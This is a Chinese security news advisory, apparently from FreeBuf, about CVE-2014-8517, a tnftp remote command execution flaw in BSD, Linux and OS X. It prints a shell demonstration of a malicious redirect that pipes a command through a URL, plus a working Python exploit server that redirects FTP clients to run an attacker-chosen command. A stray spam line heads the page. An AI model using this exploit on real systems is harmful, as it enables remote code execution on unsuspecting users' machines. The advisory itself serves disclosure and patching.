自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

漏洞預警:FTP曝嚴重遠程執(zhí)行漏洞,影響多個版本Linux(附檢測腳本)

系統(tǒng)
10月28日,一份公開的郵件中曝出FTP遠程執(zhí)行命令漏洞,漏洞影響到的Linux系統(tǒng)包括:Fedora, Debian, NetBSD, FreeBSD, OpenBSD, 甚至影響到了蘋果的OS X操作系統(tǒng)的最新版本Yosemite 10.10。

10月28日,一份公開的郵件中曝出FTP遠程執(zhí)行命令漏洞,漏洞影響到的Linux系統(tǒng)包括:Fedora, Debian, NetBSD, FreeBSD, OpenBSD, 甚至影響到了蘋果的OS X操作系統(tǒng)的***版本Yosemite 10.10。

NetBSD的一位開發(fā)人員(Jared McNeill)證實了這個漏洞可已通過tnftp讓WEB服務器遠程執(zhí)行惡意命令,并且此漏洞已被編號為CVE-2014-8517 :

  1. a20$ pwd 
  2.     /var/www/cgi-bin 
  3.   
  4. a20$ ls -l 
  5.     total 4      -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect 
  6.     -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a 
  7.   
  8. a20$ cat redirect 
  9.     #!/bin/sh      echo 'Status: 302 Found'      echo 'Content-Type: text/html'      echo 'Connection: keep-alive'      echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'      echo 
  10.   
  11. a20$ 
  12. a20$ ftp http://localhost/cgi-bin/redirect 
  13.    Trying ::1:80 ...    ftp: Can't connect to `::1:80': Connection refused 
  14.    Trying 127.0.0.1:80 ...    Requesting http://localhost/cgi-bin/redirect 
  15.    Redirected to http://192.168.2.19/cgi-bin/|uname%20-a 
  16.    Requesting http://192.168.2.19/cgi-bin/|uname%20-a 
  17.        32      101.46 KiB/s 
  18.    32 bytes retrieved in 00:00 (78.51 KiB/s)    NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36    ADT 2014    Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE 
  19.    BOARD evbarm 
  20.   
  21. a20$ 

漏洞影響范圍及公告

Debian, Red Hat, Gentoo, Novell (SuSE Linux), DragonFly, FreeBSD, OpenBSD, and Apple等系統(tǒng)開發(fā)商已經意識到了此漏洞的危害,其中Debian, Red Hat, Gnetoo and Novell已經發(fā)出了漏洞公告:

漏洞檢測腳本(請勿用于非法用途)

  1. #!/usr/bin/env python ""
  2. Sample OSX/BSD FTP client exploit. Written because ISO policies were doing 
  3. my head inTo exploit, edit the value of the cmd variable, then run the 
  4. script. To test: 
  5.   
  6.     ftp http://<myserver>/foo 
  7.   
  8. And you should see the command executed. 
  9.   
  10. All wrongs reversed - @stevelord 
  11. """ import BaseHTTPServer import sys import socket import urllib 
  12.   
  13. hostname = socket.getfqdn() # Set this to your IP if you have no FQDN port = 8000 # Set this to the port you want to run this on cmd = "uname -a; echo You probably shouldnt execute random code from the Internet. Just saying." cmd = urllib.quote(cmd) redir = "http://" + hostname + ":" + str(port) + "/cgi-bin/|" + cmd  class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(s): if cmd in s.path: s.send_response(200) s.end_headers() else: s.send_response(302) s.send_header("Location", redir) s.end_headers() if __name__ == "__main__": print "redirecting to,", redir 
  14.     server_class = BaseHTTPServer.HTTPServer httpd = server_class((hostname, port), RedirectHandler) try: httpd.serve_forever() print "Started serving." except KeyboardInterrupt: pass httpd.server_close() print "\nStopped serving." 

解決方案和更詳細的內容參見:

http://seclists.org/oss-sec/2014/q4/459 http://seclists.org/oss-sec/2014/q4/464 

http://seclists.org/oss-sec/2014/q4/460

[參考信息來源nix-systems-affected-ftp-remote-command-execution-vulnerability]

本文出自:http://www.freebuf.com/news/49411.html

責任編輯:林師授 來源: freebuf
相關推薦

2014-10-31 09:46:25

FTP遠程執(zhí)行漏洞安全漏洞

2020-10-15 12:24:46

Linux漏洞攻擊

2023-12-14 16:20:09

2021-02-28 13:29:16

黑客漏洞網絡安全

2021-09-16 14:06:55

遠程代碼漏洞微軟

2015-01-27 17:40:05

2014-04-29 11:18:27

2009-04-27 23:45:07

2022-08-15 08:28:52

漏洞底層框架Electron

2024-05-07 16:38:25

2019-05-15 15:20:01

微軟漏洞防護

2017-06-14 10:02:22

2017-06-15 17:28:36

2015-04-30 08:11:40

2023-12-08 13:18:27

2023-08-15 19:15:20

2024-05-21 13:09:55

2015-09-23 11:42:20

2019-02-21 10:11:49

2018-05-06 23:08:12

點贊
收藏

51CTO技術棧公眾號